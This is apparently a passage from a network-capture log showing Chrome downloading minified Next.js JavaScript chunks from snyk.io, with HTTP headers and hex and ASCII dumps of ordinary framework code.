                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799343.1092e08
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC15614INData Raw: 30 30 30 30 36 30 30 30 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 39 5d 2c 7b 38 34 38 37 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 22 22 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 67 65 74 44 65 70 6c 6f 79 6d 65 6e 74 49 64 51 75 65 72 79 4f 72 45 6d 70 74 79 53 74 72 69 6e 67 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{84878:function(e,t){"use strict";function r(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC8974INData Raw: 61 63 6b 73 3a 5b 65 2c 70 5d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 67 2e 6a 73 78 29 28 79 2e 64 65 66 61 75 6c 74 2e 53 74 72 69 63 74 4d 6f 64 65 2c 7b 63 68 69 6c 64 72 65 6e 3a 6d 7d 29 7d 29 29 2c 68 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 65 63 28 65 29 7b 69 66 28 65 2e 65 72 72 26 26 28 76 6f 69 64 20 30 3d 3d 3d 65 2e 43 6f 6d 70 6f 6e 65 6e 74 7c 7c 21 65 2e 69 73 48 79 64 72 61 74 65 50 61 73 73 29 29 7b 61 77 61 69 74 20 5a 28 65 29 3b 72 65 74 75 72 6e 7d 74 72 79 7b 61 77 61 69 74 20 65 73 28 65 29 7d 63 61 74 63 68 28 72 29 7b 6c 65 74 20 74 3d 28 30 2c 4c 2e 67 65 74 50 72 6f 70 65 72 45 72 72 6f 72 29 28 72 29 3b 69 66 28 74 2e 63 61 6e 63 65 6c 6c 65 64 29 74 68 72 6f 77 20 74 3b 61 77 61 69 74 20 5a 28 7b 2e 2e 2e 65 2c 65 72
                                                                                                                                                                                                                                                                                                              Data Ascii: acks:[e,p],children:(0,g.jsx)(y.default.StrictMode,{children:m})})),h}async function ec(e){if(e.err&&(void 0===e.Component||!e.isHydratePass)){await Z(e);return}try{await es(e)}catch(r){let t=(0,L.getProperError)(r);if(t.cancelled)throw t;await Z({...e,er
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 28 30 2c 6f 2e 66 6f 72 6d 61 74 57 69 74 68 56 61 6c 69 64 61 74 69 6f 6e 29 28 74 29 2c 68 3d 64 2e 6d 61 74 63 68 28 2f 5e 5b 61 2d 7a 41 2d 5a 5d 7b 31 2c 7d 3a 5c 2f 5c 2f 2f 29 2c 70 3d 68 3f 64 2e 73 6c 69 63 65 28 68 5b 30 5d 2e 6c 65 6e 67 74 68 29 3a 64 3b 69 66 28 28 70 2e 73 70 6c 69 74 28 22 3f 22 2c 31 29 5b 30 5d 7c 7c 22 22 29 2e 6d 61 74 63 68 28 2f 28 5c 2f 5c 2f 7c 5c 5c 29 2f 29 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 68 72 65 66 20 27 22 2b 64 2b 22 27 20 70 61 73 73 65 64 20 74 6f 20 6e 65 78 74 2f 72 6f 75 74 65 72 20 69 6e 20 70 61 67 65 3a 20 27 22 2b 65 2e 70 61 74 68 6e 61 6d 65 2b 22 27 2e 20 52 65 70 65 61 74 65 64 20 66 6f 72 77 61 72 64 2d 73 6c 61 73 68 65 73
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000(0,o.formatWithValidation)(t),h=d.match(/^[a-zA-Z]{1,}:\/\//),p=h?d.slice(h[0].length):d;if((p.split("?",1)[0]||"").match(/(\/\/|\\)/)){console.error("Invalid href '"+d+"' passed to next/router in page: '"+e.pathname+"'. Repeated forward-slashes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC8204INData Raw: 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 64 65 66 61 75 6c 74 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 6c 65 74 20 6e 3d 72 28 33 38 37 35 34 29 2c 6f 3d 72 28 38 35 38 39 33 29 2c 61 3d 6e 2e 5f 28 72 28 36 37 32 39 34 29 29 2c 69 3d 6e 2e 5f 28 72 28 32 33 38 36 37 29 29 2c 6c 3d 7b 34 30 30 3a 22 42 61 64 20 52 65 71 75 65 73 74 22 2c 34 30 34 3a 22 54 68 69 73 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 22 2c 34 30 35 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 2c 35 30 30 3a 22 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72
                                                                                                                                                                                                                                                                                                              Data Ascii: le",{value:!0}),Object.defineProperty(t,"default",{enumerable:!0,get:function(){return c}});let n=r(38754),o=r(85893),a=n._(r(67294)),i=n._(r(23867)),l={400:"Bad Request",404:"This page could not be found",405:"Method Not Allowed",500:"Internal Server Err
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC6988INData Raw: 30 30 30 30 31 42 34 30 0d 0a 65 73 74 2e 6a 73 6f 6e 22 2c 41 3d 22 73 65 72 76 65 72 22 2c 4c 3d 5b 22 6e 65 78 74 2e 63 6f 6e 66 69 67 2e 6a 73 22 2c 22 6e 65 78 74 2e 63 6f 6e 66 69 67 2e 6d 6a 73 22 5d 2c 4e 3d 22 42 55 49 4c 44 5f 49 44 22 2c 44 3d 5b 22 2f 5f 64 6f 63 75 6d 65 6e 74 22 2c 22 2f 5f 61 70 70 22 2c 22 2f 5f 65 72 72 6f 72 22 5d 2c 6b 3d 22 70 75 62 6c 69 63 22 2c 55 3d 22 73 74 61 74 69 63 22 2c 42 3d 22 5f 5f 4e 45 58 54 5f 44 52 4f 50 5f 43 4c 49 45 4e 54 5f 46 49 4c 45 5f 5f 22 2c 46 3d 22 5f 5f 4e 45 58 54 5f 42 55 49 4c 54 49 4e 5f 44 4f 43 55 4d 45 4e 54 5f 5f 22 2c 48 3d 22 5f 5f 62 61 72 72 65 6c 5f 6f 70 74 69 6d 69 7a 65 5f 5f 22 2c 57 3d 22 63 6c 69 65 6e 74 2d 72 65 66 65 72 65 6e 63 65 2d 6d 61 6e 69 66 65 73 74 22 2c 71
                                                                                                                                                                                                                                                                                                              Data Ascii: 00001B40est.json",A="server",L=["next.config.js","next.config.mjs"],N="BUILD_ID",D=["/_document","/_app","/_error"],k="public",U="static",B="__NEXT_DROP_CLIENT_FILE__",F="__NEXT_BUILTIN_DOCUMENT__",H="__barrel_optimize__",W="client-reference-manifest",q
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 69 73 42 61 69 6c 6f 75 74 54 6f 43 53 52 45 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 6c 65 74 20 72 3d 22 42 41 49 4c 4f 55 54 5f 54 4f 5f 43 4c 49 45 4e 54 5f 53 49 44 45 5f 52 45 4e 44 45 52 49 4e 47 22 3b 63 6c 61 73 73 20 6e 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 22 42 61 69 6c 20 6f 75 74 20 74 6f 20 63 6c 69 65 6e 74 2d 73 69 64 65 20 72 65 6e 64 65 72 69 6e 67 3a 20 22 2b 65 29 2c 74 68 69 73 2e 72 65 61 73 6f 6e 3d 65 2c 74 68 69 73 2e 64 69 67 65 73 74 3d 72 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000unction(){return n},isBailoutToCSRError:function(){return o}});let r="BAILOUT_TO_CLIENT_SIDE_RENDERING";class n extends Error{constructor(e){super("Bail out to client-side rendering: "+e),this.reason=e,this.digest=r}}function o(e){return"object"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC12INData Raw: 68 69 73 2e 70 61 74 68 6e 61 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: his.pathna
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 6d 65 26 26 28 6e 75 6c 6c 3d 3d 28 77 3d 73 65 6c 66 2e 5f 5f 4e 45 58 54 5f 44 41 54 41 5f 5f 2e 70 72 6f 70 73 29 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 28 6a 3d 77 2e 70 61 67 65 50 72 6f 70 73 29 3f 76 6f 69 64 20 30 3a 6a 2e 73 74 61 74 75 73 43 6f 64 65 29 3d 3d 3d 35 30 30 26 26 28 6e 75 6c 6c 3d 3d 28 52 3d 61 2e 70 72 6f 70 73 29 3f 76 6f 69 64 20 30 3a 52 2e 70 61 67 65 50 72 6f 70 73 29 26 26 28 61 2e 70 72 6f 70 73 2e 70 61 67 65 50 72 6f 70 73 2e 73 74 61 74 75 73 43 6f 64 65 3d 35 30 30 29 3b 6c 65 74 20 73 3d 6e 2e 73 68 61 6c 6c 6f 77 26 26 24 2e 72 6f 75 74 65 3d 3d 3d 28 6e 75 6c 6c 21 3d 28 54 3d 61 2e 72 6f 75 74 65 29 3f 54 3a 65 6c 29 2c 66 3d 6e 75 6c 6c 21 3d 28 43 3d 6e 2e 73 63 72 6f 6c 6c 29 3f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000me&&(null==(w=self.__NEXT_DATA__.props)?void 0:null==(j=w.pageProps)?void 0:j.statusCode)===500&&(null==(R=a.props)?void 0:R.pageProps)&&(a.props.pageProps.statusCode=500);let s=n.shallow&&$.route===(null!=(T=a.route)?T:el),f=null!=(C=n.scroll)?
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC12INData Raw: 26 26 28 63 2e 6c 6f 63 61 6c 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: &&(c.local
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 65 3d 65 2e 64 65 74 65 63 74 65 64 4c 6f 63 61 6c 65 29 7d 72 65 74 75 72 6e 20 63 7d 7d 2c 35 30 36 33 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 7b 7d 29 2c 74 2e 6f 6e 6c 79 48 61 73 68 43 68 61 6e 67 65 29 7b 65 28 29 3b 72 65 74 75 72 6e 7d 6c 65 74 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 6e 3d 72 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 42 65 68 61 76 69 6f 72 3b 72 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 42 65 68 61 76 69 6f 72 3d 22 61 75 74 6f 22 2c 74 2e 64 6f 6e 74 46 6f 72 63 65 4c 61 79 6f 75 74 7c 7c 72 2e 67 65 74 43 6c 69 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000e=e.detectedLocale)}return c}},50631:function(e,t){"use strict";function r(e,t){if(void 0===t&&(t={}),t.onlyHashChange){e();return}let r=document.documentElement,n=r.style.scrollBehavior;r.style.scrollBehavior="auto",t.dontForceLayout||r.getClie


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              47192.168.2.54976723.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC375OUTGET /_next/static/chunks/9371-f3c21e360213617c.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="9371-f3c21e360213617c.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"eaaa8f5b073bb1b854180a7bc6b205d3"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/9371-f3c21e360213617c.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::vrm9m-1729257049233-40e91576e406
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:03 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799343.1092e0d
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC15614INData Raw: 30 30 30 30 36 30 30 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 33 37 31 5d 2c 7b 37 34 31 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 2c 72 2c 6f 2c 61 2c 64 2c 73 2c 70 2c 6c 2c 79 2c 66 2c 63 2c 75 2c 45 2c 6d 2c 54 2c 4c 3d 6e 28 36 37 32 39 34 29 2c 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 53 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 69 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 72 20 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9371],{74129:function(e,t,n){var i,r,o,a,d,s,p,l,y,f,c,u,E,m,T,L=n(67294),S=function(){return(S=Object.assign||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r i
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC8974INData Raw: 4c 49 4e 4b 2c 61 2e 49 4e 4c 49 4e 45 53 2e 45 4e 54 52 59 5f 48 59 50 45 52 4c 49 4e 4b 2c 61 2e 49 4e 4c 49 4e 45 53 2e 41 53 53 45 54 5f 48 59 50 45 52 4c 49 4e 4b 2c 61 2e 49 4e 4c 49 4e 45 53 2e 45 4d 42 45 44 44 45 44 5f 45 4e 54 52 59 2c 22 74 65 78 74 22 5d 2c 74 2e 56 31 5f 4d 41 52 4b 53 3d 5b 64 2e 4d 41 52 4b 53 2e 42 4f 4c 44 2c 64 2e 4d 41 52 4b 53 2e 43 4f 44 45 2c 64 2e 4d 41 52 4b 53 2e 49 54 41 4c 49 43 2c 64 2e 4d 41 52 4b 53 2e 55 4e 44 45 52 4c 49 4e 45 5d 7d 2c 37 31 30 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 67 65 74 53 63 68 65 6d 61 57 69 74 68 4e 6f 64 65 54 79
                                                                                                                                                                                                                                                                                                              Data Ascii: LINK,a.INLINES.ENTRY_HYPERLINK,a.INLINES.ASSET_HYPERLINK,a.INLINES.EMBEDDED_ENTRY,"text"],t.V1_MARKS=[d.MARKS.BOLD,d.MARKS.CODE,d.MARKS.ITALIC,d.MARKS.UNDERLINE]},71024:function(e,t,n){Object.defineProperty(t,"__esModule",{value:!0}),t.getSchemaWithNodeTy
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 3a 7b 22 6d 61 78 49 74 65 6d 73 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 72 72 61 79 22 2c 22 69 74 65 6d 73 22 3a 7b 22 61 6e 79 4f 66 22 3a 5b 7b 22 24 72 65 66 22 3a 22 23 2f 64 65 66 69 6e 69 74 69 6f 6e 73 2f 49 6e 6c 69 6e 65 22 7d 2c 7b 22 24 72 65 66 22 3a 22 23 2f 64 65 66 69 6e 69 74 69 6f 6e 73 2f 54 65 78 74 22 7d 5d 7d 7d 7d 2c 22 61 64 64 69 74 69 6f 6e 61 6c 50 72 6f 70 65 72 74 69 65 73 22 3a 66 61 6c 73 65 2c 22 72 65 71 75 69 72 65 64 22 3a 5b 22 63 6f 6e 74 65 6e 74 22 2c 22 64 61 74 61 22 2c 22 6e 6f 64 65 54 79 70 65 22 5d 7d 2c 22 4c 69 6e 6b 3c 5c 5c 22 45 6e 74 72 79 5c 5c 22 3e 22 3a 7b 22 74 79 70 65 22 3a 22 6f 62 6a 65 63 74 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 73 79 73 22 3a 7b 22 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000:{"maxItems":0,"type":"array","items":{"anyOf":[{"$ref":"#/definitions/Inline"},{"$ref":"#/definitions/Text"}]}}},"additionalProperties":false,"required":["content","data","nodeType"]},"Link<\\"Entry\\">":{"type":"object","properties":{"sys":{"t
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC8204INData Raw: 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 24 72 65 66 22 3a 22 23 2f 64 65 66 69 6e 69 74 69 6f 6e 73 2f 48 72 22 2c 22 64 65 66 69 6e 69 74 69 6f 6e 73 22 3a 7b 22 48 72 22 3a 7b 22 74 79 70 65 22 3a 22 6f 62 6a 65 63 74 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 6e 6f 64 65 54 79 70 65 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 2c 22 65 6e 75 6d 22 3a 5b 22 68 72 22 5d 7d 2c 22 64 61 74 61 22 3a 7b 22 6d 61 78 49 74 65 6d 73 22 3a 30 2c 22 74 79 70 65 22 3a 22 6f 62 6a 65 63 74 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 7d 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 72 72 61 79 22 2c 22 69 74 65 6d 73 22 3a 7b 22 61 6e 79 4f 66 22 3a 5b 7b 22 24 72 65 66 22 3a 22 23 2f 64 65 66 69 6e 69 74 69
                                                                                                                                                                                                                                                                                                              Data Ascii: orts=JSON.parse('{"$ref":"#/definitions/Hr","definitions":{"Hr":{"type":"object","properties":{"nodeType":{"type":"string","enum":["hr"]},"data":{"maxItems":0,"type":"object","properties":{}},"content":{"type":"array","items":{"anyOf":[{"$ref":"#/definiti
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC14875INData Raw: 30 30 30 30 33 41 30 46 0d 0a 61 22 3a 22 68 74 74 70 3a 2f 2f 6a 73 6f 6e 2d 73 63 68 65 6d 61 2e 6f 72 67 2f 64 72 61 66 74 2d 30 37 2f 73 63 68 65 6d 61 23 22 7d 27 29 7d 2c 33 38 39 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 24 72 65 66 22 3a 22 23 2f 64 65 66 69 6e 69 74 69 6f 6e 73 2f 50 61 72 61 67 72 61 70 68 22 2c 22 64 65 66 69 6e 69 74 69 6f 6e 73 22 3a 7b 22 50 61 72 61 67 72 61 70 68 22 3a 7b 22 74 79 70 65 22 3a 22 6f 62 6a 65 63 74 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 6e 6f 64 65 54 79 70 65 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 2c 22 65 6e 75 6d 22 3a 5b 22 70 61 72 61 67 72 61 70 68 22 5d 7d 2c 22 64 61 74 61 22 3a 7b 22 74 79 70 65 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00003A0Fa":"http://json-schema.org/draft-07/schema#"}')},38986:function(e){e.exports=JSON.parse('{"$ref":"#/definitions/Paragraph","definitions":{"Paragraph":{"type":"object","properties":{"nodeType":{"type":"string","enum":["paragraph"]},"data":{"type"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:04 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              48192.168.2.54977023.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC381OUTGET /_next/static/chunks/pages/_app-0cbf3048c9ba7463.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="_app-0cbf3048c9ba7463.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"7f16b636d5c74b50ae2eada438d25a23"
                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 21 Oct 2024 15:08:12 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/pages/_app-0cbf3048c9ba7463.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::bhxnw-1729523291825-23419c4525b6
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:03 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799343.1092e1f
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:03 UTC15608INData Raw: 30 30 30 30 36 30 30 30 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 38 38 38 5d 2c 7b 35 31 30 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 61 28 37 34 33 33 31 29 2c 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 79 70 65 6f 66 20 65 3b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 26 26 22 5b 6f 62 6a 65 63 74 20 4e 75 6d 62 65 72 5d 22 3d 3d 3d 6e 2e 63 61 6c 6c 28 65 29 7d 2c 73 3d 22 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{51075:function(e,t,a){"use strict";var r=a(74331),n=Object.prototype.toString,o=function(e){var t=typeof e;return"number"===t||"object"===t&&"[object Number]"===n.call(e)},s="functi
